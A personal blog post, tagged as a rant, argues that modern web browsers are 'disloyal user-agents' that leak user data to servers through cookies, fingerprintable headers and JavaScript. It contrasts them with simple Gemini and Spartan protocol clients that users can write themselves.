Disloyal User-Agents

Published: 2022-05-16

Updated: 2022-05-16

Tags: #rant #security #tech #web #browsers

Can a protocol control its User-Agents

Much as been made in the posts and discussions surrounding the design of the

gemini protocol and about limiting what user-agents can reveal about their user

to servers. The general call to arms is "It's None of Your Damned Business!"

which in general sums the mission statement of the TOR-Browser and other

privacy centered browser plugins.

SolderPunk's Gemini Phlog

But despite all the effort to which the Gemini protocol has gone, it's still

technically possible for a nefarious user-agent and malicious server to

colaborate and share information about the user which the user would prefer to

keep private.

I call user-agents which collaborate with servers in a way which goes against

a users interests "Disloyal User-Agents".

For reasons (outlined below) I doubt the Gemini clients will become a disloyal

user-agents, but there's nothing in principle preventing them.

The Many Betrayals of Disloyal User-Agents

Modern HTTP/HTML browsers are an objectively Disloyal User-Agent. It didn't

start out that way but the evolution of browsers, and their modern default

behaviour, is much more aligned with the needs of servers than the needs of the

user it represents.

Cookies are probably the pinacle of disloyalty. The server and user-agent can

tag a user, and then continuously exchange this information behind the users

back without notification or permission. I have yet to see a mainstream

browser that allows explicit whitelisting of Cookies as a core feature,

something that was proposed in the original RFC outlining Cookie Headers.

RFC 2109: HTTP State Management Mechanism - PRIVACY

Well documented are the many other headers which can be be combined to identify

the user, or at least put them in a small bucket or users. Again these are

added implicitly to outgoing request without control given to the user. If you

have never tried it out I highly recommend visiting the EFF's Panopticlick

project to see how accurately you can be identified and tracked using

information leaked by the disloyal user-agent (browser) you are using.

EFF Panopticlick Project

Beyond the default behaviour leaking information we have to also consider

clientside code execution of remote code. Whilst javascript has undoubtedly

unleased the power of the HTTP/HTML, the only security model is the Same-Origin

model, and this puts little if any control in the hands of users. Once

again the privacy of a user is mostly in control of configuration sent by the

server which the user-agent faithfully follows. There's not way for a user to

prevent a server from inspecting features via that web-api (these should be

whitelisted), there's no way to prevent information leakage via dns requests.

Even pre-flight queries can transport information which really puts a limit on

the protections CORS can provide.

The tragedy of the situation is that it is browser standardisation which has

gone a long way in creating the current situation. Standard headers, default

web-apis, and default expected behaviour have been forced into user-agents

with little to no recourse from users themselves.

Fostering good behaviour

The most trusted user-agent is the one you write yourself. One of the great

things about the Gemini and Spartan protocols, and the gemtext document type,

is that they are simple enough to quickly write a custom user-agent with which

to explore this new web of content.

A Tiny Bash Gemini Client

Laconia - A Simple Spartan Protocol Client

A phenomenal number of user-agents will (hopefully) be produced for protocols

and document types of this simplicity. And this in effect will create choice

and competition where users will (also hopefully) find user-agents which value

their needs rather than that of the servers.

The small size of the community may also help as bad acting clients & servers

may be publically shamed, and users may hopefully abandon them.

Can the HTTP/HTML browser ever be saved?

The constraint that a client should be simple enough for a wide selection of

software developers to code is a large limiting factor on creating dynamic

content and sophisticated internet applications. HTTP/HTML Browsers are really

amazing peices of software and allow incredible experiences to be delivered to

a user. But the chances of you or Me building such a piece of software by

ourselves, or even in a small group, is now extremely unlikely.

For this reason I don't think there's any hope of saving the HTTP/HTML web.

It's simply too complex for new entrants, most new browsers just fork off of

the Chromium project. Regulators around the world are trying to tackle this

issue, but my prediction is that they're not capable of operating at the speed

and complexity of the tech and its evolving protocols.

Beyond Gemini & Spartan

Instead of starting with the protocol what if we start with a framework of a

"Loyal User-Agent". What is the maximum level of complexity that a user can

understand and configure to manage their privacy? What is the maximum level of

complexity that a large number of software developers reasonably be expected to

tackle when creating a user-agent? Is it possible to deliver rich internet

applications without centralised standards bodies?

I don't yet have the answer to these questions, although I do have some nascent

ideas forming.